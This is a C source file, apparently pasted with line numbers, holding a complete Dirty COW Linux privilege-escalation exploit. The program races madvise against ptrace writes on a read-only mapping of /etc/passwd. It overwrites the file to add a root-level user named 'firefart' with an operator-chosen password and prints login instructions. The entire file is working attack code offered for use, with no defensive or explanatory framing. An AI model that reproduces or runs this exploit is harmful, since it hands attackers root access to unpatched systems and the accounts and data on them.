#include <fcntl.h>#include <pthread.h>#include <string.h>#include <stdio.h

1. #include <fcntl.h>
2. #include <pthread.h>
3. #include <string.h>
4. #include <stdio.h>
5. #include <stdint.h>
6. #include <sys/mman.h>
7. #include <sys/types.h>
8. #include <sys/stat.h>
9. #include <sys/wait.h>
10. #include <sys/ptrace.h>
11. #include <stdlib.h>
12. #include <unistd.h>
13. #include <crypt.h>
14.  
15. const char *filename = "/etc/passwd";
16. const char *backup_filename = "/tmp/passwd.bak";
17. const char *salt = "firefart";
18.  
19. int f;
20. void *map;
21. pid_t pid;
22. pthread_t pth;
23. struct stat st;
24.  
25. struct Userinfo {
26. char *username;
27. char *hash;
28. int user_id;
29. int group_id;
30. char *info;
31. char *home_dir;
32. char *shell;
33. };
34.  
35. char *generate_password_hash(char *plaintext_pw) {
36. return crypt(plaintext_pw, salt);
37. }
38.  
39. char *generate_passwd_line(struct Userinfo u) {
40. const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
41. int size = snprintf(NULL, 0, format, u.username, u.hash,
42. u.user_id, u.group_id, u.info, u.home_dir, u.shell);
43. char *ret = malloc(size + 1);
44. sprintf(ret, format, u.username, u.hash, u.user_id,
45. u.group_id, u.info, u.home_dir, u.shell);
46. return ret;
47. }
48.  
49. void *madviseThread(void *arg) {
50. int i, c = 0;
51. for(i = 0; i < 200000000; i++) {
52. c += madvise(map, 100, MADV_DONTNEED);
53. }
54. printf("madvise %d\n\n", c);
55. }
56.  
57. int copy_file(const char *from, const char *to) {
58. // check if target file already exists
59. if(access(to, F_OK) != -1) {
60. printf("File %s already exists! Please delete it and run again\n",
61. to);
62. return -1;
63. }
64.  
65. char ch;
66. FILE *source, *target;
67.  
68. source = fopen(from, "r");
69. if(source == NULL) {
70. return -1;
71. }
72. target = fopen(to, "w");
73. if(target == NULL) {
74. fclose(source);
75. return -1;
76. }
77.  
78. while((ch = fgetc(source)) != EOF) {
79. fputc(ch, target);
80. }
81.  
82. printf("%s successfully backed up to %s\n",
83. from, to);
84.  
85. fclose(source);
86. fclose(target);
87.  
88. return 0;
89. }
90.  
91. int main(int argc, char *argv[])
92. {
93. // backup file
94. int ret = copy_file(filename, backup_filename);
95. if (ret != 0) {
96. exit(ret);
97. }
98.  
99. struct Userinfo user;
100. // set values, change as needed
101. user.username = "firefart";
102. user.user_id = 0;
103. user.group_id = 0;
104. user.info = "pwned";
105. user.home_dir = "/root";
106. user.shell = "/bin/bash";
107.  
108. char *plaintext_pw;
109.  
110. if (argc >= 2) {
111. plaintext_pw = argv[1];
112. printf("Please enter the new password: %s\n", plaintext_pw);
113. } else {
114. plaintext_pw = getpass("Please enter the new password: ");
115. }
116.  
117. user.hash = generate_password_hash(plaintext_pw);
118. char *complete_passwd_line = generate_passwd_line(user);
119. printf("Complete line:\n%s\n", complete_passwd_line);
120.  
121. f = open(filename, O_RDONLY);
122. fstat(f, &st);
123. map = mmap(NULL,
124. st.st_size + sizeof(long),
125. PROT_READ,
126. MAP_PRIVATE,
127. f,
128. 0);
129. printf("mmap: %lx\n",(unsigned long)map);
130. pid = fork();
131. if(pid) {
132. waitpid(pid, NULL, 0);
133. int u, i, o, c = 0;
134. int l=strlen(complete_passwd_line);
135. for(i = 0; i < 10000/l; i++) {
136. for(o = 0; o < l; o++) {
137. for(u = 0; u < 10000; u++) {
138. c += ptrace(PTRACE_POKETEXT,
139. pid,
140. map + o,
141. *((long*)(complete_passwd_line + o)));
142. }
143. }
144. }
145. printf("ptrace %d\n",c);
146. }
147. else {
148. pthread_create(&pth,
149. NULL,
150. madviseThread,
151. NULL);
152. ptrace(PTRACE_TRACEME);
153. kill(getpid(), SIGSTOP);
154. pthread_join(pth,NULL);
155. }
156.  
157. printf("Done! Check %s to see if the new user was created.\n", filename);
158. printf("You can log in with the username '%s' and the password '%s'.\n\n",
159. user.username, plaintext_pw);
160. printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
161. backup_filename, filename);
162. return 0;
163. }